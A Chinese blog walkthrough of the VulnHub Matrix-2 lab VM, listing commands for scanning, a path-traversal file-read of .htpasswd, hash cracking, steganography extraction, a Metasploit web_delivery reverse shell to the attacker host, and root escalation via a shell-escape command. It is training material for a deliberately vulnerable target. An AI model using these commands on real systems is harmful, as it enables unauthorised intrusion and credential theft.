本周实践的是vulnhub的Matrix-2镜像,
下载地址,https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.187,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,
发现靶机开了1337、12320、12322端口的https服务,
浏览器访问https://192.168.0.187:1337,需要登录,
浏览器访问https://192.168.0.187:12320,是web命令行,
由于之前12322端口的https服务扫描到file_view.php路径,
尝试文件包含漏洞,成功,发现了n30账户,
继续文件包含,curl -X POST -k https://192.168.0.187:12322/file_view.php -d "file=../../../../../etc/nginx/sites-available/default"
获取到/var/www/p4ss/.htpasswd,
再继续文件包含,curl -X POST -k https://192.168.0.187:12322/file_view.php -d "file=../../../../../var/www/p4ss/.htpasswd",
获取到Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0,
保存到文件,vim hash,
暴破,john hash --wordlist=/usr/share/wordlists/rockyou.txt,
获取到Tr1n17y/admin,
登录https://192.168.0.187:1337,页面源码中获取到n30账户的密码隐藏在图片h1dd3n.jpg中,
下载图片,curl -u Tr1n17y:admin -k https://192.168.0.187:1337/h1dd3n.jpg -o h1dd3n.jpg,
并破解,steghide extract -sf h1dd3n.jpg -p n30,
获取到密码,cat n30.txt,P4$$w0rd,
登录https://192.168.0.187:12320成功,
上msf,
use exploit/multi/script/web_delivery
set SRVHOST 192.168.0.190
set LHOST 192.168.0.190
exploit
去web命令行执行,获取到反弹shell,sessions 1,
查看到能提权的历史命令,
ls,cat .bash_history,
morpheus 'BEGIN {system("/bin/sh")}',
进入普通shell,执行提权命令,
morpheus 'BEGIN {system("/bin/sh")}',
获取到新的shell,id确认是root权限,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Matrix-2的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论